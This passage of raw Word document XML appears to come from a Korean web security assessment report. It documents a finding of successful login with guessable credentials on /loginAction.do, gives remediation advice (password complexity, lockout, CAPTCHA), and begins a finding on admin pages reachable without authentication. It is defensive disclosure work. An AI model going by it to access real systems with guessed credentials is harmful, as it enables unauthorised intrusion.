          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7281E565" wp14:editId="2F1D47B6">
            <wp:extent cx="4572000" cy="2684854"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2032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653" b="48661"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="26848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4C0E70" w14:textId="2BDAE26A" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc20909460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35</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002C50FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">추측할 수 있는 </w:t>
      </w:r>
      <w:r w:rsidR="0006073C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>계정 조합으로 로그인 시도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
    </w:p>
    <w:p w14:paraId="75D2C6D6" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3222EC2A" w14:textId="2E676FDD" w:rsidR="000B6D70" w:rsidRDefault="00CC368E" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251544576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="513B3B9D" wp14:editId="1154DEF9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2882900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>643890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="441960" cy="198120"/>
                <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474625" name="직사각형 1951474625"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4419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FFC03" id="직사각형 1951474625" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:227pt;margin-top:50.7pt;width:34.8pt;height:15.6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mIuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mGnMRG5MBI4KJA&#10;kAR1iqxpirIEUByWpC27u/QOBXqDbrrouYr0Dh1Snxhp0EVRLSiSM/OG8+Zzdr6rJdkKYytQGU2O&#10;YkqE4pBXap3RD3eLN6eUWMdUziQokdG9sPR89vrVWaOnYgQlyFwYgiDKThud0dI5PY0iy0tRM3sE&#10;WigUFmBq5vBo1lFuWIPotYxGcXwcNWBybYALa/H2shXSWcAvCsHdTVFY4YjMKL7NhdWEdeXXaHbG&#10;pmvDdFnx7hnsH15Rs0qh0wHqkjlGNqb6A6quuAELhTviUEdQFBUXIQaMJomfRbMsmRYhFiTH6oEm&#10;+/9g+fX21pAqx9xNxkl6kh6PxpQoVmOuHr89PH7+/vPHw6+vX8iBGDlrtJ2i6VLfmu5kcesJ2BWm&#10;9n8MjewCz/uBZ7FzhONlmiaTY8wGR1EyOU1GIQ/Rk7E21r0VUBO/yajBNAZ22fbKOnSIqr2K96Vg&#10;UUkZUikVaTxoPI6DhQVZ5V7q9axZry6kIVuG1bBYxPj5AkC0AzU8SYWXPsQ2qLBzeyk8hlTvRYGE&#10;YRij1oMvVTHAMs6FckkrKlkuWm/jQ2e9RXAdAD1yga8csDuAXrMF6bHbN3f63lSESh+Mu9D/ZjxY&#10;BM+g3GBcVwrMS5FJjKrz3Or3JLXUeJZWkO+xnAy0fWY1X1SYwStm3S0z2FiYdBwW7gaXQgJmCrod&#10;JSWYTy/de32sd5RS0mCjZtR+3DAjKJHvFHbCJElT39nhkI5PsJiIOZSsDiVqU18AZj/BsaR52Hp9&#10;J/ttYaC+x5ky915RxBRH3xnlzvSHC9cOEJxKXMznQQ27WTN3pZaae3DPqq/Qu909M7orY4f1fw19&#10;U7Pps2pudb2lgvnGQVGFUn/iteMbJ0EonG5q+VFzeA5aT7N19hsAAP//AwBQSwMEFAAGAAgAAAAh&#10;AKkL0rfgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoUzdNqxCnAiSE&#10;QBygwN1NtklUex3FbhL+nuUEx50Zzb4pdrOzYsQhdJ40LBcJCKTK1x01Gj4/Hm+2IEI0VBvrCTV8&#10;Y4BdeXlRmLz2E73juI+N4BIKudHQxtjnUoaqRWfCwvdI7B394Ezkc2hkPZiJy52VKkky6UxH/KE1&#10;PT60WJ32Z6fhzZ+O0n4p9bK5f1KbZ7edmvFV6+ur+e4WRMQ5/oXhF5/RoWSmgz9THYTVkK5T3hLZ&#10;SJYpCE6s1SoDcWBlpTKQZSH/byh/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFEAWYi4&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKkL&#10;0rfgAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082C4738" wp14:editId="7FFA9F5D">
            <wp:extent cx="4572000" cy="1815811"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="1951474624" name="그림 19514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1" b="30930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1815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ADACF" w14:textId="73E0ACDE" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc209094609"/>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36</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0091655F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정상적인 로그인 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
    </w:p>
    <w:p w14:paraId="25524269" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="00D34207">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCA7814" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">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0B6D70" w:rsidRPr="00B112DB" w14:paraId="2FBBA077" w14:textId="77777777" w:rsidTr="005E1156">
        <w:trPr>
          <w:trHeight w:val="425"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="781" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="756D9179"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0772B29E"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563AFAFD"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0B6D70" w:rsidRPr="00B112DB" w14:paraId="5D921E3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C07C5EE" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000B6D70" w:rsidP="005E1156">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4106FD" w14:textId="76F74B24" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="00925450"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6B5F559" w14:textId="36D0D510" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="00925450" w:rsidP="005E1156">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00925450">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00925450">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="00925450">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>oginForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00925450" w:rsidRPr="00B112DB" w14:paraId="6974E870"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19001E5" w14:textId="45060846" w:rsidR="00925450" w:rsidRPr="00CB22A6" w:rsidRDefault="00925450"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A54FFD" w14:textId="1F1651CF" w:rsidR="00925450" w:rsidRDefault="00925450"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로그인 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인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CFA4D51" w14:textId="048A86E1" w:rsidR="00925450" w:rsidRPr="00987A57" w:rsidRDefault="00925450" w:rsidP="005E1156">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00925450">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/login</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Acti</w:t>
            </w:r>
            <w:r w:rsidR="00CA2D6E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
            <w:r w:rsidRPr="00925450">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="499DF760" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C27FE15" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD95EA" w14:textId="7892B7AE" w:rsidR="005D4622" w:rsidRDefault="00255FF1" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인 계정 및 패스워드 정책을 강화하고,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자가 추측</w:t>
      </w:r>
      <w:r w:rsidR="009C1B88">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">할 수 있는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값 또는 단순한 패턴을 사용할 수 없도록 최소 복잡도 규칙을 적용해야 합니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일정 횟수(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>3~5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>회</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이상 로그인</w:t>
      </w:r>
      <w:r w:rsidR="00ED6922">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시도 실패가 발생하면</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해당 계정 또는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 대해 일정 시간 동안 로그인 시도를 제한하거나,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAP</w:t>
      </w:r>
      <w:r w:rsidR="009A421E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>CHA(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동 입력 방지 문자</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등의 추가 인증 절차를 도입해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C738A" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622">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28895C63" w14:textId="121B1DC2" w:rsidR="005D4622" w:rsidRDefault="00451516" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc209094561"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>불충분한 인증</w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
    </w:p>
    <w:p w14:paraId="38AA00FB" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF46DCE" w14:textId="222B16D1" w:rsidR="005D4622" w:rsidRPr="00B5070A" w:rsidRDefault="00451516" w:rsidP="00451516">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>중요정보</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 페이지에 대한 인증 절차가 불충분</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하거나</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권한이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 없는 사용자가 중요정보 페이지에 접근</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는 경우 중요정보 페이지에 접근하여 정보를 유출하거나 변조할</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 수 있으므로 중요정보 페이지에는 추가적인 인증 절차를 구현</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782562C1" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4A8E1C" w14:textId="77777777" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A95B9" w14:textId="040FCFDF" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="007704F3" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 페이지에 별도의 인증 없이 접근이 가능한 경우,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격자가 별도의 제한 없이 중요 기능을 수행하거나 민감 정보를 탈취할 수 있는 취약점이 발견되었습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228EB3F9" w14:textId="77777777" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579B2229" w14:textId="77777777" w:rsidR="005D4622" w:rsidRPr="00CB22A6" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251549696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="128C1F05" wp14:editId="4CC0B9BB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3613150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>734060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="264795" cy="213360"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474626" name="직사각형 1951474626"/>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76A78" id="직사각형 1951474626" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:284.5pt;margin-top:57.8pt;width:20.85pt;height:16.8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DuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHfTJKVRN1XUKgip&#10;aita1LPjtbMreT3Gdv64lXeoxBtw4cBzofIOjL0/jUrFAZGD49mZ+cbzzc/J6bZWZC2sq0DnNDtI&#10;KRGaQ1HpZU4/3s7fvKXEeaYLpkCLnO6Eo6fT169ONmYiBlCCKoQlCKLdZGNyWnpvJknieClq5g7A&#10;CI1KCbZmHkW7TArLNoheq2SQpuNkA7YwFrhwDr+eN0o6jfhSCu6vpHTCE5VTfJuPp43nIpzJ9IRN&#10;lpaZsuLtM9g/vKJmlcagPdQ584ysbPUHVF1xCw6kP+BQJyBlxUXMAbPJ0mfZ3JTMiJgLkuNMT5P7&#10;f7D8cn1tSVVg7Y5H2fBoOB6MKdGsxlo9frt//PL954/7X18fyJ4aOdsYN0HXG3NtW8nhNRCwlbYO&#10;/5ga2Uaedz3PYusJx4+D8fDoeEQJR9UgOzwcxzokT87GOv9OQE3CJacWyxjZZesL5zEgmnYmIZaG&#10;eaVULKXSZBNySUdp9HCgqiJog52zy8WZsmTNsBvm8xR/oQEQbc8MJaXxY0ixSSre/E6JgKH0ByGR&#10;sJBGEyG0quhhGedC+6xRlawQTbTRfrDOI4aOgAFZ4it77Bags2xAOuzmza19cBWx03vnNvW/Ofce&#10;MTJo3zvXlQb7UmYKs2ojN/YdSQ01gaUFFDtsJwvNnDnD5xVW8II5f80sDhaOIC4Lf4WHVICVgvZG&#10;SQn280vfgz32O2op2eCg5tR9WjErKFHvNU7CcTYchsmOwnB0NEDB7msW+xq9qs8Aq5/hWjI8XoO9&#10;V91VWqjvcKfMQlRUMc0xdk65t51w5psFgluJi9ksmuE0G+Yv9I3hATywGjr0dnvHrGnb2GP/X0I3&#10;1GzyrJsb2+CpYbbyIKvY6k+8tnzjJoiN026tsGr25Wj1tFunvwEAAP//AwBQSwMEFAAGAAgAAAAh&#10;AIEi/xrgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyoE4smbYhTARJC&#10;oB6gtHc33iZR/RPFbhLenuUEx50ZzX5TbmZr2IhD6LyTkC4SYOhqrzvXSNh/vdytgIWonFbGO5Tw&#10;jQE21fVVqQrtJ/eJ4y42jEpcKJSENsa+4DzULVoVFr5HR97JD1ZFOoeG60FNVG4NF0mScas6Rx9a&#10;1eNzi/V5d7ESPvz5xM1BiPf86VXkb3Y1NeNWytub+fEBWMQ5/oXhF5/QoSKmo784HZiRsMzWtCWS&#10;kS4zYJTI0iQHdiTlfi2AVyX/v6H6AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFRBn4O4&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIEi&#10;/xrgAAAACwEAAA8AAAAAAAAAAAAAAAAAEgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A04E24" wp14:editId="18A21A05">
            <wp:extent cx="4572000" cy="1925664"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17780"/>
            <wp:docPr id="1951474630" name="그림 19514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53" b="63177"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1925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7A5C67" w14:textId="6DB6B32F" w:rsidR="005D4622" w:rsidRDefault="005D4622" w:rsidP="005D4622">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="_Toc20909461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37</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
